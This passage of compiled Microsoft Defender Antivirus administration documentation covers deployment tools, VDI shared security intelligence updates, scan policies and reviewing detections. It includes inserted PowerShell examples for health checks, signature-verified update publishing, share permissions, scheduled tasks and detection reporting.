4. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan.

5. Double-click the Allow users to pause scan setting and set the option to Disabled.
Select OK.

UI Lockdown mode
The -UILockdown parameter of Set-MpPreference controls UI lockdown (headless UI)
mode. Set it to $True to hide the Microsoft Defender Antivirus interface; this is the
PowerShell equivalent of the Enable headless UI mode Group Policy setting. Set it to
$False, or leave it unset, to keep the interface visible.

PS C:\>Set-MpPreference -UILockdown $true

Related articles
Configure the notifications that appear on endpoints
Configure end-user interaction with Microsoft Defender Antivirus
Microsoft Defender Antivirus in Windows 10


Deploy, manage, and report on Microsoft Defender Antivirus
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus is installed as a core part of Windows 10 and 11, and is
included in Windows Server 2016 and later (Windows Server 2012 requires Microsoft
Defender for Endpoint). You can manage and report on Microsoft Defender Antivirus
using one of several tools, such as:

Microsoft Intune
Configuration Manager
PowerShell
Group Policy and Microsoft Entra ID
Windows Management Instrumentation

This article describes these options for deployment, management, and reporting.

Microsoft Intune
With Intune, you can manage device security through policies, such as a policy to
configure Microsoft Defender Antivirus and other security capabilities in Defender for
Endpoint. To learn more, see Use policies to manage device security.

For reporting, you can choose from several options:

Use the Microsoft Defender portal, which includes a device inventory list. To access
the device inventory, in the Microsoft Defender portal
(https://security.microsoft.com/ ), go to Assets > Devices. The device inventory
list displays onboarded devices along with their health state and risk level.

Manage devices with Intune, which includes the ability to view detailed information
about devices and take action. Available actions include starting an antivirus scan,
restarting a device, locating a device, wiping a device, and more.

Configuration Manager
With Configuration Manager, you can manage security and malware on Configuration
Manager client computers. Use the Endpoint Protection point site system role and
enable Endpoint Protection with custom client settings. You can use default and
customized antimalware policies.

For reporting, you can choose from several options:

Use the Microsoft Defender portal, which includes a device inventory list. To access
the device inventory, in the Microsoft Defender portal
(https://security.microsoft.com/ ), go to Assets > Devices. The device inventory
list displays onboarded devices along with their health state and risk level.

Use Intune to view device details.

Use the default Configuration Manager Monitoring workspace.

Create email alerts.

PowerShell
You can use PowerShell with Group Policy or Configuration Manager to manage
Microsoft Defender Antivirus on client devices. You can also use PowerShell to manage
Microsoft Defender Antivirus manually on individual devices that are not managed by a
security team.

Use the appropriate Get- cmdlets available in the Defender module.

Use the Set-MpPreference and Update-MpSignature cmdlets that are available in
the Defender module.

For reporting, you can choose from the following options:

Use the Microsoft Defender portal, which includes a device inventory list. To access
the device inventory, in the Microsoft Defender portal
(https://security.microsoft.com/ ), go to Assets > Devices. The device inventory
list displays onboarded devices along with their health state and risk level.

Use Intune to view device details.

Use the default Configuration Manager Monitoring workspace.

Group Policy and Microsoft Entra ID

You can use a Group Policy Object to deploy configuration changes and ensure
Microsoft Defender Antivirus is enabled. Use Group Policy Objects (GPOs) to configure
update options for Microsoft Defender Antivirus and configure Windows Defender
features.

For reporting, keep in mind that device reporting isn't available with Group Policy.

You can generate a list of Group Policies to determine if any settings or policies
aren't applied.

If your organization has Defender for Endpoint, you can also use the Microsoft
Defender portal, which includes a device inventory list. To access the device
inventory, in the Microsoft Defender portal (https://security.microsoft.com/ ), go
to Assets > Devices. The device inventory list displays onboarded devices along
with their health state and risk level.

Windows Management Instrumentation

With Windows Management Instrumentation (WMI), you can manage Microsoft
Defender Antivirus with Group Policy or Configuration Manager. You can also use WMI
to manage Microsoft Defender Antivirus manually on individual devices that aren't
managed by a security team.

Use the Set method of the MSFT_MpPreference class and the Update method of
the MSFT_MpSignature class.

Use the MSFT_MpComputerStatus class and the get method of associated classes
in the Windows Defender WMIv2 Provider.

For reporting, Windows events comprise several security event sources, including
Security Account Manager (SAM) events (enhanced for Windows 10). Also see Security
auditing and Windows Defender events.

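As an added example (not from this article), the following PowerShell reads MSFT_MpComputerStatus through the WMIv2 provider in the root/Microsoft/Windows/Defender namespace, which is what the WMI bullets above refer to, and turns it into a pass/fail health record that can be collected from many devices. The two age thresholds and the optional remote computer name are assumptions for the example; the property names are those of the MSFT_MpComputerStatus class.

```powershell
# Added example, not from the Microsoft page: local or remote Defender health
# check over CIM/WMI. Thresholds are assumptions; align them with your policy.
function Test-DefenderHealth {
    param(
        [string]$ComputerName,             # omit for the local device
        [int]$MaxSignatureAgeDays = 2,     # assumption: alert if intelligence is older
        [int]$MaxQuickScanAgeDays = 7      # assumption: alert if no quick scan in a week
    )
    $cim = @{ Namespace = 'root/Microsoft/Windows/Defender'; ClassName = 'MSFT_MpComputerStatus' }
    if ($ComputerName) { $cim.ComputerName = $ComputerName }   # WinRM to the remote host
    $s = Get-CimInstance @cim

    $findings = New-Object System.Collections.Generic.List[string]
    if (-not $s.AMServiceEnabled)          { $findings.Add('antimalware service not enabled') }
    if ($s.AMRunningMode -ne 'Normal')     { $findings.Add("running mode '$($s.AMRunningMode)' (passive/EDR block: another AV is primary)") }
    if (-not $s.RealTimeProtectionEnabled) { $findings.Add('real-time protection disabled') }
    if (-not $s.BehaviorMonitorEnabled)    { $findings.Add('behavior monitoring disabled') }
    if (-not $s.IoavProtectionEnabled)     { $findings.Add('scanning of downloaded files and attachments (IOAV) disabled') }
    if (-not $s.IsTamperProtected)         { $findings.Add('tamper protection off') }
    if ($s.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
        $findings.Add("signatures $($s.AntivirusSignatureAge) days old (version $($s.AntivirusSignatureVersion))")
    }
    if ($s.QuickScanAge -gt $MaxQuickScanAgeDays) { $findings.Add("last quick scan $($s.QuickScanAge) days ago") }

    [pscustomobject]@{
        Computer          = if ($ComputerName) { $ComputerName } else { $env:COMPUTERNAME }
        Engine            = $s.AMEngineVersion
        Platform          = $s.AMProductVersion
        SignatureVersion  = $s.AntivirusSignatureVersion
        SignatureUpdated  = $s.AntivirusSignatureLastUpdated
        RunningMode       = $s.AMRunningMode
        RealTime          = [bool]$s.RealTimeProtectionEnabled
        TamperProtected   = [bool]$s.IsTamperProtected
        LastQuickScanEnd  = $s.QuickScanEndTime
        Healthy           = ($findings.Count -eq 0)
        Findings          = ($findings -join '; ')
    }
}

# Local device; add -ComputerName for a remote host that accepts WinRM.
Test-DefenderHealth | Format-List
```

Run it against a list of hosts and keep only rows where Healthy is False to get the same "unhealthy endpoints" view the Intune and Configuration Manager reports above give you, without either management plane.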
See also
Microsoft Defender Antivirus compatibility with other security products
Deploy and enable Microsoft Defender Antivirus protection
Manage Microsoft Defender Antivirus updates and apply baselines
Monitor and report on Microsoft Defender Antivirus protection
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

 Tip

Performance tip: Due to a variety of factors, Microsoft Defender Antivirus, like other
antivirus software, can cause performance issues on endpoint devices. In some
cases, you might need to tune the performance of Microsoft Defender Antivirus to
alleviate those performance issues. Microsoft's Performance analyzer is a
PowerShell command-line tool that helps determine which files, file paths,
processes, and file extensions might be causing performance issues. You can use
the information gathered using Performance analyzer to better assess performance
issues and apply remediation actions. See Performance analyzer for Microsoft
Defender Antivirus.


Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop
infrastructure environment
Article • 03/08/2023

Applies to:

Microsoft Defender Antivirus
Defender for Endpoint Plan 1
Defender for Endpoint Plan 2

Platforms

Windows

 Tip

This article is designed for customers who are using Microsoft Defender Antivirus
capabilities only. If you have Microsoft Defender for Endpoint (which includes
Microsoft Defender Antivirus alongside additional device protection capabilities),
skip this article and proceed to Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft Defender XDR.

You can use Microsoft Defender Antivirus in a Remote Desktop Services (RDS) or
non-persistent virtual desktop infrastructure (VDI) environment. Following the
guidance in this article, you can configure updates to download directly to your RDS
or VDI environments when a user signs in.

This guide describes how to configure Microsoft Defender Antivirus on your VMs for
optimal protection and performance, including how to:

Set up a dedicated VDI file share for security intelligence updates
Randomize scheduled scans
Use quick scans
Prevent notifications
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while
Apply exclusions

) Important

Although a VDI can be hosted on Windows Server 2012 or Windows Server 2016,
virtual machines (VMs) should be running Windows 10, version 1607 at a minimum,
due to increased protection technologies and features that are unavailable in
earlier versions of Windows.

Set up a dedicated VDI file share for security intelligence

In Windows 10, version 1903, Microsoft introduced the shared security intelligence
feature, which offloads the unpackaging of downloaded security intelligence updates
onto a host machine. This method reduces the usage of CPU, disk, and memory
resources on individual machines. Shared security intelligence now works on Windows
10, version 1703 and later. You can set up this capability by using Group Policy or
PowerShell, as described below:

Method: Group Policy

1. On your Group Policy management computer, open the Group Policy
Management Console, right-click the Group Policy Object you want to configure,
and then select Edit.

2. In the Group Policy Management Editor, go to Computer configuration, select
Administrative templates, and expand the tree to Windows components > Microsoft
Defender Antivirus > Security Intelligence Updates.

3. Double-click Define security intelligence location for VDI clients, and then set
the option to Enabled. A field automatically appears.

4. Enter \\<sharedlocation>\wdav-update (for help with this value, see Download
and unpackage).

5. Select OK.

6. Deploy the GPO to the VMs you want to test.

Method: PowerShell

1. On each RDS or VDI device, use the following cmdlet to enable the feature:
Set-MpPreference -SharedSignaturesPath \\<shared location>\wdav-update

2. Push the update as you normally would push PowerShell-based configuration
policies onto your VMs. (See the Download and unpackage section for the <shared
location> entry.)

Download and unpackage the latest updates

Now you can get started on downloading and installing new updates. We've created a
sample PowerShell script for you below. This script is the easiest way to download new
updates and get them ready for your VMs. You should then set the script to run at a
certain time on the management machine by using a scheduled task (or, if you're
familiar with using PowerShell scripts in Azure, Intune, or SCCM, you could also use
those scripts).

PowerShell

# Folder name is a GUID whose last 12 digits are the download timestamp, so
# each run creates a new folder that the VMs pick up.
$vdmpathbase = "$env:systemdrive\wdav-update\{00000000-0000-0000-0000-"
$vdmpathtime = Get-Date -format "yMMddHHmmss"
$vdmpath = $vdmpathbase + $vdmpathtime + '}'
$vdmpackage = $vdmpath + '\mpam-fe.exe'

New-Item -ItemType Directory -Force -Path $vdmpath | Out-Null

# Download the latest x64 security intelligence package.
Invoke-WebRequest -Uri 'https://go.microsoft.com/fwlink/?LinkID=121721&arch=x64' -OutFile $vdmpackage

# /x extracts the package contents into the working directory.
Start-Process -FilePath $vdmpackage -WorkingDirectory $vdmpath -ArgumentList "/x"
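The script above executes whatever it downloaded without checking it, and it returns before the extraction finishes, so a VM that polls the share at the wrong moment can see a half-written folder. The following is an added, hardened variant (not the article's script and not Microsoft's): it downloads into a local staging folder, refuses to run the package unless it carries a valid Microsoft Authenticode signature, waits for extraction, publishes the result to the share under a freshly named GUID folder, and prunes old folders. The share path and download URL are the ones used in this article; the retention count of three folders is an assumption.

```powershell
# Added example, not from the Microsoft page: hardened download-and-unpack.
# Assumptions: the account running this can write to $ShareRoot; keep 3 folders.
$ShareRoot   = '\\fileserver.fqdn\mdatp$\wdav-update'
$DownloadUrl = 'https://go.microsoft.com/fwlink/?LinkID=121721&arch=x64'
$KeepFolders = 3

$stamp   = Get-Date -Format 'yMMddHHmmss'            # last 12 digits of the GUID, as in the article
$guid    = "{00000000-0000-0000-0000-${stamp}}"
$staging = Join-Path $env:TEMP "wdav-$stamp"           # unpack locally, publish when complete
$package = Join-Path $staging 'mpam-fe.exe'
New-Item -ItemType Directory -Force -Path $staging | Out-Null

try {
    Invoke-WebRequest -Uri $DownloadUrl -OutFile $package -UseBasicParsing

    # Only execute what Microsoft signed: a tampered or truncated download stops here,
    # before anything runs and before anything reaches the share the VMs trust.
    $sig = Get-AuthenticodeSignature -FilePath $package
    if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        throw "mpam-fe.exe signature check failed: status $($sig.Status), signer '$($sig.SignerCertificate.Subject)'"
    }

    # /x extracts into the working directory; -Wait so only a complete set of files is published.
    $proc = Start-Process -FilePath $package -WorkingDirectory $staging -ArgumentList '/x' -Wait -PassThru
    if ($proc.ExitCode -ne 0) { throw "extraction failed with exit code $($proc.ExitCode)" }

    # Copy under a temporary name, then rename, so VMs never see a half-copied GUID folder.
    $tmpTarget = Join-Path $ShareRoot "$guid.tmp"
    Copy-Item -Path $staging -Destination $tmpTarget -Recurse -Force
    Rename-Item -Path $tmpTarget -NewName $guid

    # Retention: keep only the newest $KeepFolders timestamped GUID folders.
    Get-ChildItem -Path $ShareRoot -Directory |
        Where-Object { $_.Name -match '^\{00000000-0000-0000-0000-\d{12}\}$' } |
        Sort-Object LastWriteTime -Descending |
        Select-Object -Skip $KeepFolders |
        Remove-Item -Recurse -Force
}
finally {
    Remove-Item -Path $staging -Recurse -Force -ErrorAction SilentlyContinue
}
```

The signature check is the important addition: every VM in the pool will load engine and definition files from whatever lands in this share, so the share is a supply-chain choke point and the publishing account should be the only identity with write access to it.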

You can set a scheduled task to run once a day so that whenever the package is
downloaded and unpacked then the VMs will receive the new update. We suggest
starting with once a day, but you should experiment with increasing or decreasing the
frequency to understand the impact.

Security intelligence packages are typically published once every three to four hours.
Setting a frequency shorter than four hours isn't advisable because it will increase the
network overhead on your management machine for no benefit.

You can also set up a single server or machine to fetch the updates on behalf of the
VMs at an interval and place them in the file share for consumption. This configuration
works when the devices have both share permissions and NTFS read permissions on the
share, so they can read the updates. To set this configuration up, follow these steps:

1. Create an SMB/CIFS file share.

2. Grant read-only share permissions. The following output shows the expected
share permissions for the example share:

PowerShell

PS c:\> Get-SmbShareAccess -Name mdatp$

Name    ScopeName  AccountName  AccessControlType  AccessRight
----    ---------  -----------  -----------------  -----------
mdatp$  *          Everyone     Allow              Read

7 Note

An NTFS permission is added for Authenticated Users:Read.

For this example, the file share is:

\\fileserver.fqdn\mdatp$\wdav-update
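As an added example (not from this article), the following PowerShell creates the share exactly as the permissions above describe, read-only at the share level for Everyone and read-only at the NTFS level for Authenticated Users (which includes the VMs' computer accounts), and grants write access only to the account that publishes updates. The local folder, the publishing account, and the use of SMB encryption are assumptions for the example.

```powershell
# Added example, not from the Microsoft page. Run elevated on the file server.
# Assumptions: local path, the publishing account name, and SMB 3 encryption.
$SharePath = 'D:\Shares\mdatp'                 # local folder behind the share
$ShareName = 'mdatp$'                          # hidden share name used in the article
$Writer    = 'CONTOSO\svc-wdav-update'         # only identity allowed to publish updates

New-Item -ItemType Directory -Force -Path (Join-Path $SharePath 'wdav-update') | Out-Null

# Share-level ACL: Everyone Read (matches the Get-SmbShareAccess output above),
# Change only for the publisher. EncryptData enforces SMB 3 encryption in transit.
if (-not (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue)) {
    New-SmbShare -Name $ShareName -Path $SharePath -ReadAccess 'Everyone' -ChangeAccess $Writer `
        -EncryptData $true -Description 'Defender security intelligence for VDI' | Out-Null
}

# NTFS ACL: replace inherited permissions with an explicit, minimal set.
$acl = Get-Acl -Path $SharePath
$acl.SetAccessRuleProtection($true, $false)    # stop inheritance, do not copy inherited rules
$rules = @(
    @('NT AUTHORITY\SYSTEM',               'FullControl'),
    @('BUILTIN\Administrators',            'FullControl'),
    @($Writer,                             'Modify'),
    @('NT AUTHORITY\Authenticated Users',  'ReadAndExecute')   # VM computer accounts are Authenticated Users
)
foreach ($r in $rules) {
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $r[0], $r[1], 'ContainerInherit,ObjectInherit', 'None', 'Allow')
    $acl.AddAccessRule($rule)
}
Set-Acl -Path $SharePath -AclObject $acl

# Verify both layers.
Get-SmbShareAccess -Name $ShareName
(Get-Acl -Path $SharePath).Access |
    Format-Table IdentityReference, FileSystemRights, AccessControlType -AutoSize
```

Effective access is the intersection of the share ACL and the NTFS ACL, so a VM (Everyone at the share, Authenticated Users on NTFS) ends up read-only even if someone later loosens one of the two layers; the publisher needs Change at the share and Modify on NTFS to write new GUID folders and delete old ones.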

Set a scheduled task to run the PowerShell script

1. On the management machine, open the Start menu and type Task Scheduler.
Open it and select Create task... on the side panel.

2. Enter the name as Security intelligence unpacker. Go to the Trigger tab. Select
New... > Daily, and select OK.

3. Go to the Actions tab. Select New... Enter PowerShell in the Program/Script field.
Enter -ExecutionPolicy Bypass c:\wdav-update\vdmdlunpack.ps1 in the Add
arguments field. Select OK.

4. Configure any other settings as appropriate.

5. Select OK to save the scheduled task.

You can initiate the update manually by right-clicking on the task and then selecting
Run.
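As an added example (not from this article), the same daily task can be registered from PowerShell with the ScheduledTasks module, which is easier to keep in source control than Task Scheduler clicks. The script path is the one the steps above use; the 03:00 start time is an assumption.

```powershell
# Added example, not from the Microsoft page: register the unpacker task from PowerShell.
$ScriptPath = 'C:\wdav-update\vdmdlunpack.ps1'     # path used in the steps above
$TaskName   = 'Security intelligence unpacker'

# The task runs as SYSTEM, so the script file must live in a folder that only
# administrators can write to; anyone who can edit it gets SYSTEM code execution daily.
# When SYSTEM writes to the UNC share, it authenticates as this machine's computer
# account, which therefore needs write access on the share.
$action    = New-ScheduledTaskAction -Execute 'powershell.exe' `
                -Argument "-NoProfile -NonInteractive -ExecutionPolicy Bypass -File `"$ScriptPath`""
$trigger   = New-ScheduledTaskTrigger -Daily -At '03:00'        # assumption: off-peak start time
$principal = New-ScheduledTaskPrincipal -UserId 'NT AUTHORITY\SYSTEM' -LogonType ServiceAccount -RunLevel Highest
$settings  = New-ScheduledTaskSettingsSet -StartWhenAvailable -MultipleInstances IgnoreNew `
                -ExecutionTimeLimit (New-TimeSpan -Hours 1)

Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
    -Principal $principal -Settings $settings -Force | Out-Null

# Run it once now; check the result after it finishes (LastTaskResult 0 = success).
Start-ScheduledTask -TaskName $TaskName
Get-ScheduledTaskInfo -TaskName $TaskName | Select-Object LastRunTime, LastTaskResult, NextRunTime
```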

Download and unpackage manually

If you would prefer to do everything manually, here's what to do to replicate the script's
behavior:

1. Create a new folder on the system root called wdav-update to store intelligence
updates, for example, create the folder c:\wdav-update .

2. Create a subfolder under wdav-update with a GUID name, such as
{00000000-0000-0000-0000-000000000000}

Here's an example: c:\wdav-update\{00000000-0000-0000-0000-000000000000}

7 Note

In the script we set it so the last 12 digits of the GUID are the year, month,
day, and time when the file was downloaded so that a new folder is created
each time. You can change this so that the file is downloaded to the same
folder each time.

3. Download a security intelligence package from
https://www.microsoft.com/wdsi/definitions into the GUID folder. The file should
be named mpam-fe.exe .

4. Open a cmd prompt window and navigate to the GUID folder you created. Use the
/X extraction command to extract the files, for example mpam-fe.exe /X .

7 Note

The VMs will pick up the updated package whenever a new GUID folder is
created with an extracted update package or whenever an existing folder is
updated with a new extracted package.

Randomize scheduled scans

Scheduled scans run in addition to real-time protection and scanning.

The start time of the scan itself is still based on the scheduled scan policy (ScheduleDay,
ScheduleTime, and ScheduleQuickScanTime). Randomization will cause Microsoft
Defender Antivirus to start a scan on each machine within a four-hour window from the
time set for the scheduled scan.

See Schedule scans for other configuration options available for scheduled scans.

Use quick scans

You can specify the type of scan that should be performed during a scheduled scan.
Quick scans are the preferred approach as they're designed to look in all places where
malware needs to reside to be active. The following procedure describes how to set up
quick scans using Group Policy.

1. In your Group Policy Editor, go to Administrative templates > Windows
components > Microsoft Defender Antivirus > Scan.

2. Select Specify the scan type to use for a scheduled scan and then edit the policy
setting.

3. Set the policy to Enabled, and then under Options, select Quick scan.

4. Select OK.

5. Deploy your Group Policy object as you usually do.

Prevent notifications
Sometimes, Microsoft Defender Antivirus notifications are sent to or persist across
multiple sessions. To help avoid user confusion, you can lock down the Microsoft
Defender Antivirus user interface. The following procedure describes how to suppress
notifications using Group Policy.

1. In your Group Policy Editor, go to Windows components > Microsoft Defender
Antivirus > Client Interface.

2. Select Suppress all notifications and then edit the policy settings.

3. Set the policy to Enabled, and then select OK.

4. Deploy your Group Policy object as you usually do.

Suppressing notifications prevents notifications from Microsoft Defender Antivirus from
showing up when scans are done or remediation actions are taken. However, your
security operations team will see the results of a scan if an attack is detected and
stopped. Alerts, such as an initial access alert, are generated and will appear in the
Microsoft Defender portal.

Disable scans after an update

Disabling a scan after an update will prevent a scan from occurring after receiving an
update. You can apply this setting when creating the base image if you have also run a
quick scan. This way, you can prevent the newly updated VM from performing a scan
again (as you've already scanned it when you created the base image).

) Important

Running scans after an update will help ensure your VMs are protected with the
latest security intelligence updates. Disabling this option will reduce the protection
level of your VMs and should only be used when first creating or deploying the
base image.

1. In your Group Policy Editor, go to Windows components > Microsoft Defender
Antivirus > Security Intelligence Updates.

2. Select Turn on scan after security intelligence update and then edit the policy
setting.

3. Set the policy to Disabled.

4. Select OK.

5. Deploy your Group Policy object as you usually do.

This policy prevents a scan from running immediately after an update.

Disable the ScanOnlyIfIdle option

By default, scheduled quick and full scans wait until the device is idle before they
start. In a high-density VDI environment, many VMs become idle at the same time, and
the resulting simultaneous scans cause significant CPU contention on the host. Use the
following cmdlet so that scheduled scans run at their scheduled (randomized) time
instead of waiting for the device to go idle. The setting also applies when Microsoft
Defender Antivirus is running in passive mode.

PowerShell

Set-MpPreference -ScanOnlyIfIdleEnabled $false

You can also disable the ScanOnlyIfIdle option through local or domain Group Policy.

For more information, see Start the scheduled scan only when computer is on but not in
use.

Scan VMs that have been offline

1. In your Group Policy Editor, go to Windows components > Microsoft Defender
Antivirus > Scan.

2. Select Turn on catch-up quick scan and then edit the policy setting.

3. Set the policy to Enabled.

4. Select OK.

5. Deploy your Group Policy Object as you usually do.

This policy forces a scan if the VM has missed two or more consecutive scheduled scans.

Enable headless UI mode

1. In your Group Policy Editor, go to Windows components > Microsoft Defender
Antivirus > Client Interface.

2. Select Enable headless UI mode and edit the policy.

3. Set the policy to Enabled.

4. Select OK.

5. Deploy your Group Policy Object as you usually do.

This policy hides the entire Microsoft Defender Antivirus user interface from end users in
your organization.
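The sections from Randomize scheduled scans through Enable headless UI mode each describe one Group Policy setting. As an added example (not from this article), the following PowerShell applies the same VDI baseline with Set-MpPreference, which is useful when building the base image or for VMs that are not domain-joined, and then reads the settings back with Get-MpPreference to confirm they took effect. Two settings in this article have no Set-MpPreference parameter and stay GPO- or Intune-managed: Suppress all notifications and Turn on scan after security intelligence update. The share path is the one used in this article.

```powershell
# Added example, not from the Microsoft page: apply and verify the VDI scan
# baseline with the Defender PowerShell module. Run elevated on the VM or image.
$Baseline = @{
    SharedSignaturesPath       = '\\fileserver.fqdn\mdatp$\wdav-update'  # shared security intelligence
    ScanParameters             = 'QuickScan'   # scheduled scans are quick scans
    RandomizeScheduleTaskTimes = $true         # spread scheduled scans across the window
    ScanOnlyIfIdleEnabled      = $false        # do not wait for idle (avoids host CPU contention)
    DisableCatchupQuickScan    = $false        # catch-up quick scan for VMs that missed scans
    UILockdown                 = $true         # headless UI
}

function Set-DefenderVdiBaseline {
    Set-MpPreference @Baseline -ErrorAction Stop
}

function Test-DefenderVdiBaseline {
    # One row per setting with the value Defender reports back. Get-MpPreference
    # shows the effective value, so a GPO/Intune policy that sets the same item
    # differently will show up here as a mismatch.
    $pref = Get-MpPreference
    $expectedScan = if ($Baseline.ScanParameters -eq 'QuickScan') { 1 } else { 2 }   # 1 = quick, 2 = full
    $checks = @(
        @{ Name = 'SharedSignaturesPath';       Expected = $Baseline.SharedSignaturesPath;       Actual = [string]$pref.SharedSignaturesPath }
        @{ Name = 'ScanParameters';             Expected = $expectedScan;                        Actual = [int]$pref.ScanParameters }
        @{ Name = 'RandomizeScheduleTaskTimes'; Expected = $Baseline.RandomizeScheduleTaskTimes; Actual = [bool]$pref.RandomizeScheduleTaskTimes }
        @{ Name = 'ScanOnlyIfIdleEnabled';      Expected = $Baseline.ScanOnlyIfIdleEnabled;      Actual = [bool]$pref.ScanOnlyIfIdleEnabled }
        @{ Name = 'DisableCatchupQuickScan';    Expected = $Baseline.DisableCatchupQuickScan;    Actual = [bool]$pref.DisableCatchupQuickScan }
        @{ Name = 'UILockdown';                 Expected = $Baseline.UILockdown;                 Actual = [bool]$pref.UILockdown }
    )
    foreach ($c in $checks) {
        [pscustomobject]@{
            Setting  = $c.Name
            Expected = $c.Expected
            Actual   = $c.Actual
            Match    = ($c.Expected -eq $c.Actual)
        }
    }
}

Set-DefenderVdiBaseline
$result = Test-DefenderVdiBaseline
$result | Format-Table -AutoSize
if ($result | Where-Object { -not $_.Match }) {
    Write-Warning 'One or more settings did not apply; check for a conflicting GPO or Intune policy.'
}
```

Local preferences set this way lose to a policy that configures the same item, which is the behavior you want: use the script for images and unmanaged VMs, and let GPO or Intune own the setting wherever it is deployed.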

Exclusions
If you think you need to add exclusions, see Manage exclusions for Microsoft Defender
for Endpoint and Microsoft Defender Antivirus.

See also
Tech Community Blog: Configuring Microsoft Defender Antivirus for non-persistent
VDI machines
TechNet forums on Remote Desktop Services and VDI
SignatureDownloadCustomTask PowerShell script

If you're looking for information about Defender for Endpoint on non-Windows
platforms, see the following resources:
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features


Review Microsoft Defender Antivirus scan results
Article • 12/12/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Individuals
Microsoft Defender Antivirus

Platforms

Windows

After a Microsoft Defender Antivirus scan completes, whether it's an on-demand or
scheduled scan, the results are recorded and you can view the results.

Use Microsoft Defender XDR to review scan results

To view scan results in the Microsoft Defender portal, follow this process:

1. Sign in to the Microsoft Defender portal.

2. Go to Incidents & alerts > Alerts.

Detections from scans appear as alerts.

Use Microsoft Intune to review scan results

To view the scan results using the Microsoft Intune admin center, follow this process:

1. Sign in to the Microsoft Intune admin center.

2. Go to Reports.

3. Under Endpoint security, select Microsoft Defender Antivirus.

4. In the Reports tab, select Detected malware.

5. Select the Severity level from the dropdown list.

By default All severity option is selected.

6. Select Execution state from the dropdown list.

By default All execution state option is selected.

7. Select Managed by from the dropdown list.

By default All Managed by option is selected.

8. Click on Generate report.

Use Configuration Manager to review scan results

See How to monitor Endpoint Protection status.

Use PowerShell cmdlets to review scan results

The following cmdlet returns each detection on the endpoint. If there are multiple
detections of the same threat, each detection is listed separately, based on the time of
each detection:

PowerShell

Get-MpThreatDetection

You can specify -ThreatID to limit the output to only show the detections for a specific
threat.

If you want to list threat detections, but combine detections of the same threat into a
single item, you can use the following cmdlet:

PowerShell

Get-MpThreat

See Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets for more information on how to use PowerShell with
Microsoft Defender Antivirus.

Use Windows Management Instrumentation (WMI) to review scan results

Use the Get method of the MSFT_MpThreat and MSFT_MpThreatDetection classes.
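As an added example (not from this article), the following PowerShell turns the two cmdlets and the two WMI classes above into a detection report for one endpoint: Get-MpThreat carries the threat name and severity, Get-MpThreatDetection carries each detection event with only a ThreatID, so the script joins them on ThreatID, then cross-checks the same window against the Defender operational event log. The seven-day window and the CSV path are assumptions.

```powershell
# Added example, not from the Microsoft page: detection report from the
# Defender module, the event log, and the WMIv2 provider. Run elevated.
function Get-DefenderDetectionReport {
    param([int]$Days = 7)   # assumption: reporting window
    $since = (Get-Date).AddDays(-$Days)

    # Index threats by ID so each detection event can be enriched with name/severity.
    $threatById = @{}
    foreach ($t in Get-MpThreat) { $threatById[[string]$t.ThreatID] = $t }

    Get-MpThreatDetection |
        Where-Object { $_.InitialDetectionTime -ge $since } |
        Sort-Object InitialDetectionTime -Descending |
        ForEach-Object {
            $t = $threatById[[string]$_.ThreatID]
            [pscustomobject]@{
                Detected   = $_.InitialDetectionTime
                ThreatName = if ($t) { $t.ThreatName } else { "ThreatID $($_.ThreatID)" }
                SeverityID = if ($t) { $t.SeverityID } else { $null }   # 0 unknown, 1 low, 2 moderate, 4 high, 5 severe
                Resources  = ($_.Resources -join '; ')                   # files, registry keys, processes involved
                Process    = $_.ProcessName
                User       = $_.DomainUser
                Remediated = [bool]$_.ActionSuccess
                StatusID   = $_.ThreatStatusID
            }
        }
}

function Get-DefenderDetectionEvents {
    # Same window from the event log: 1116 = malware detected, 1117 = action taken.
    param([int]$Days = 7)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1116, 1117
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
}

function Get-DefenderDetectionsViaCim {
    # WMIv2 equivalent of Get-MpThreatDetection; add -ComputerName for a remote host over WinRM.
    param([string]$ComputerName)
    $cim = @{ Namespace = 'root/Microsoft/Windows/Defender'; ClassName = 'MSFT_MpThreatDetection' }
    if ($ComputerName) { $cim.ComputerName = $ComputerName }
    Get-CimInstance @cim
}

$report = Get-DefenderDetectionReport -Days 7
$report | Format-Table Detected, ThreatName, SeverityID, Remediated, Resources -AutoSize
$report | Export-Csv -Path "$env:TEMP\defender-detections.csv" -NoTypeInformation   # assumption: output path
Get-DefenderDetectionEvents -Days 7 | Format-Table -AutoSize
```

Compare the cmdlet output with the 1116/1117 events when investigating: a 1116 without a matching 1117, or a row with Remediated False, is a detection that was not cleaned up and needs follow-up.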


Related articles
Customize, initiate, and review the results of Microsoft Defender Antivirus scans
and remediation
Address false positives/negatives in Microsoft Defender for Endpoint
Microsoft Defender Antivirus in Windows 10



Configure and run on-demand Microsoft Defender Antivirus scans
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Individuals
Microsoft Defender Antivirus

You can run an on-demand scan on individual endpoints. These scans will start
immediately, and you can define parameters for the scan, such as the location or type.
When you run a scan, you can choose from among three types: Quick scan, full scan,
and custom scan. In most cases, use a quick scan. A quick scan looks at all the locations
where there could be malware registered to start with the system, such as registry keys
and known Windows startup folders.

